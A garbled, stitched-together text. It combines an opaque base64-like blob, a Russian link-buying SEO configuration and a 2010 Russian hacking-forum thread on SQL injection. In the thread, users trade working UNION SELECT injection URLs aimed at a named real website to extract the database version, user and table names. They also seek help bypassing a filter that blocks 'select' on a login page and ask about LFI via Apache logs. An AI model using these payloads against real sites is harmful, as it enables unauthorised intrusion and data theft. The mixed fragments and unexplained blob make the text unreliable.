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 Это он же но текстом:
Версия: 1
Сценарий
Название: НЧ ВК
Дневная Квота: 50
Снимать, если к размещению больше, дней: 10
Снимать, если не обнаружена больше, дней: 7
Снимать, если в черном списке: Да
Покупать не более одной с домена: Да
Снимать ссылку с главной странице, если не в индексе Яндекса больше, дней: 14
Снимать ссылку со страницы с уровнем вложенности 1, если не в индексе Яндекса больше, дней: 14
Снимать ссылку со страницы с уровнем вложенности 2, если не в индексе Яндекса больше, дней: 21
Снимать ссылку со страницы с уровнем вложенности 3 и более, если не в индексе Яндекса больше, дней: 28
Снимать ссылку с главной странице, если не в индексе Гугла больше, дней: 0
Снимать ссылку со страницы с уровнем вложенности 1, если не в индексе Гугла больше, дней: 0
Снимать ссылку со страницы с уровнем вложенности 2, если не в индексе Гугла больше, дней: 0
Снимать ссылку со страницы с уровнем вложенности 3 и более, если не в индексе Гугла больше, дней: 0
Снимать, если цена уменьшилась на: 15%
Снимать, если цена увеличилась на: 15%
Процент вариаций с точным вхождением и разбавлением: 40
Процент вариаций с точным вхождением и окружением: 20
Процент вариаций с неточным вхождением и разбавлением: 30
Процент вариаций с неточным вхождением и окружением: 0
Правило
Доля, %: 5
PR от: 1
PR до: 10
тИЦ от: 200
тИЦ до: 1000000000
Цена от: 0,00
Цена до: 350,00
Уровень домена:
Доменные зоны:
Уровень вложенности от: 0
Уровень вложенности до: 2
В индексе Яндекса: Да
В индексе Гугла: Нет
Не покупать страницы, находящиеся в блеклисте: Да
Внешних ссылок от: 0
Внешних ссылок до: 3
Наличие в Яндекс Каталоге: Да
Наличие в каталоге DMOZ: Нет
Исключить форумы: Да
Возраст сайта от: 180
Возраст сайта до: 10000
Продажный возраст сайта от: 60
Продажный возраст сайта до: 10000
Прогноз внешних ссылок от: 1
Прогноз внешних ссылок до: 5
Страниц сайта в индексе от: 30
Не покупать с порно страниц: Да
PR главной от: 0
PR главной до: 0
Правило
Доля, %: 5
PR от: 0
PR до: 10
тИЦ от: 200
тИЦ до: 1000000000
Цена от: 0,00
Цена до: 100,00
Уровень домена:
Доменные зоны:
Уровень вложенности от: 0
Уровень вложенности до: 2
В индексе Яндекса: Да
В индексе Гугла: Нет
Не покупать страницы, находящиеся в блеклисте: Да
Внешних ссылок от: 0
Внешних ссылок до: 3
Наличие в Яндекс Каталоге: Да
Наличие в каталоге DMOZ: Нет
Исключить форумы: Да
Возраст сайта от: 180
Возраст сайта до: 10000
Продажный возраст сайта от: 60
Продажный возраст сайта до: 10000
Прогноз внешних ссылок от: 1
Прогноз внешних ссылок до: 5
Страниц сайта в индексе от: 30
Не покупать с порно страниц: Да
PR главной от: 0
PR главной до: 0
Правило
Доля, %: 45
PR от: 0
PR до: 10
тИЦ от: 100
тИЦ до: 1000000000
Цена от: 0,00
Цена до: 50,00
Уровень домена:
Доменные зоны:
Уровень вложенности от: 0
Уровень вложенности до: 2
В индексе Яндекса: Да
В индексе Гугла: Нет
Не покупать страницы, находящиеся в блеклисте: Да
Внешних ссылок от: 0
Внешних ссылок до: 3
Наличие в Яндекс Каталоге: Да
Наличие в каталоге DMOZ: Нет
Исключить форумы: Да
Возраст сайта от: 180
Возраст сайта до: 10000
Продажный возраст сайта от: 60
Продажный возраст сайта до: 10000
Прогноз внешних ссылок от: 1
Прогноз внешних ссылок до: 5
Страниц сайта в индексе от: 30
Не покупать с порно страниц: Да
PR главной от: 0
PR главной до: 0
Правило
Доля, %: 30
PR от: 0
PR до: 10
тИЦ от: 50
тИЦ до: 1000000000
Цена от: 0,00
Цена до: 15,00
Уровень домена:
Доменные зоны:
Уровень вложенности от: 0
Уровень вложенности до: 2
В индексе Яндекса: Да
В индексе Гугла: Нет
Не покупать страницы, находящиеся в блеклисте: Да
Внешних ссылок от: 0
Внешних ссылок до: 3
Наличие в Яндекс Каталоге: Нет
Наличие в каталоге DMOZ: Нет
Исключить форумы: Да
Возраст сайта от: 180
Возраст сайта до: 10000
Продажный возраст сайта от: 30
Продажный возраст сайта до: 10000
Прогноз внешних ссылок от: 1
Прогноз внешних ссылок до: 5
Страниц сайта в индексе от: 30
Не покупать с порно страниц: Да
PR главной от: 0
PR главной до: 0
Правило
Доля, %: 15
PR от: 0
PR до: 10
тИЦ от: 10
тИЦ до: 1000000000
Цена от: 0,00
Цена до: 5,00
Уровень домена:
Доменные зоны:
Уровень вложенности от: 0
Уровень вложенности до: 3
В индексе Яндекса: Да
В индексе Гугла: Нет
Не покупать страницы, находящиеся в блеклисте: Да
Внешних ссылок от: 0
Внешних ссылок до: 5
Наличие в Яндекс Каталоге: Нет
Наличие в каталоге DMOZ: Нет
Исключить форумы: Да
Возраст сайта от: 180
Возраст сайта до: 10000
Продажный возраст сайта от: 30
Продажный возраст сайта до: 10000
Прогноз внешних ссылок от: 1
Прогноз внешних ссылок до: 10
Страниц сайта в индексе от: 10
Не покупать с порно страниц: Да
PR главной от: 0
PR главной до: 0
Есть несколько текстов которые мне необходимо расшифровать, надеюсь на вашу помощь
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-14 23:57:13.890000
|
|
|
sergaj
Сообщений: 24
Оценки: 0
Присоединился: 2010-03-30 10:30:48.270000
|
Вопросы по LFI через логи Апача здесь задавать?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-15 00:54:27.133333
|
|
|
alexhiccs
Сообщений: 95
Оценки: 0
Присоединился: 2010-05-23 14:58:49.416666
|
какую лучше всего купить книгу по изучению (SQL-inj) сори если не в тему.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-16 10:30:46.243333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.xakep.ru/magazine/xa/111/default.asp
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-16 13:06:01.153333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: gunusa
Помогите найти нужную таблицу
http://fly2fly.ru/news.php?id=-2+union+select+1,2,3,4,5,6
P.S:Дайте список всех таблиц)
Посмотри на версию БД ( http://fly2fly.ru/news.php?id=-2+union+select+1,2,3,version(),5,6– ). И сам себе даш ответ.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-16 13:57:35.153333
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
http://fly2fly.ru/samolet.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-16 14:05:26.203333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: gunusa
Алекс помоги , а то я неь оченьь трезвыйй
http://fly2fly.ru/news.php?id=-2+union+select+1,2,3,table_name,5,6+from+information_schema.tables–
Этим всё сказано.
PS: я не пью, и тебе не советую :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-17 13:58:35.240000
|
|
|
sergaj
Сообщений: 24
Оценки: 0
Присоединился: 2010-03-30 10:30:48.270000
|
подбор по словарю - 3 таблицы есть, но нужной среди них нет, видать префикс интересный очень.
"PS: я не пью, и тебе не советую" Куришь???:D
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-17 17:21:52.143333
|
|
|
alexhiccs
Сообщений: 95
Оценки: 0
Присоединился: 2010-05-23 14:58:49.416666
|
Чуваки какой лучше учебник по sql иньекции купить\скачать.. ???? ответе в ПМ пожалуйста.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-06-17 19:37:11.993333
|
|
|
zerohour2
Сообщений: 4
Оценки: 0
Присоединился: 2010-06-17 19:12:24.650000
|
Здравствуйте уважаемые форумчане. Являюсь новичком SQL Inj и видимо наткнулся на свою первую систему фильтрации. Дело в том что как только в параметре появляется select страница начинает возвращать 403 ошибку. По видимому больше ничего не фильтруется. Подскажите пожалуйста, как обойти эту фильтрацию?
Пробовал смену регистра букв (select, SELECT, SeLeCt) и комментарий (sel/**/ect). Однако в первом случае фильтрацию запрос так и не прошел, а во втором вывалилась ошибка SQL запроса.
autorize.php?acc='+union+seL/**/Ect+1,2,3,4,5+--+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'seL/**/Ect 1,2,3,4,5 -- ' and password='2jmj7l5rSw0yVb/vlWAYkK/YBwk='' at line 1
При дальнейшем ковырянии через order by смог узнать количество столбцов и имена 8 из них, в том числе и самые вкусные. Дальнейшей эксплуатации мешает только данный фильтр.
Помогите пожалуйста. Заранее спасибо.
|
|
|
|
|
|
